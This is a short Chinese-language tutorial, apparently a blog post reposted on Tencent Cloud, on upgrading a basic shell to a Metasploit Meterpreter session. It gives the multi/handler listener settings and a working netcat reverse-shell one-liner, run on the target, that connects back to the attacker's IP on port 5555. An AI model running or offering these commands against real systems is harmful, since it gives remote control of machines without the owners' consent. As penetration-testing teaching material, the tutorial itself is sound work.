前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >​meterpreter shell | 加固shell

​meterpreter shell | 加固shell

作者头像
意大利的猫
发布2020-08-20 14:51:50
1.6K0
发布2020-08-20 14:51:50
举报
文章被收录于专栏:漫流砂漫流砂漫流砂

https://null-byte.wonderhowto.com/how-to/elevate-netcat-shell-meterpreter-session-for-more-power-control-0193211/

metasploit 中的 meterpreter shell 是一个我们比较喜欢的shell,因为方便我们后续加载各种模块,简直不要太方便

所以我们这次把一个简单的shell升级为 meterpreter shell

攻击机配置msf 监听:

  • use exploit/multi/handler
  • set payload linux/x86/shell/reverse_tcp
  • set lport 5555
  • set lhost 192.168.1.38
  • run

目标主机上直接nc 反弹shell

rm -f /tmp/f; mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.38 5555 > /tmp/f

可以看到现在状态还是一个普通shell,并不是一个tty,现在我们来变个魔术 在这个shell中输入 background 在对话中选择 y 成功将shell放在了后台

我们使用 sessions -u 1 将普通shell提升为 meterpreter shell(创建一个新的shell)

可以看到有一个新的meterpreter shell 产生了,仔细看回显其实可以看出实际上是调用了 post/multi/manage/shell_to_meterpreter 我们进入这个shell来测试一下吧

可以看到成功获取到meterpreter 的shell,这个shell 功能太全了,之前说的命令补全、Ctrl+c 不退出 但是默认不支持 su,ssh等 当然可以使用msf的库来实现了

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-04-27,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 NOP Team 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档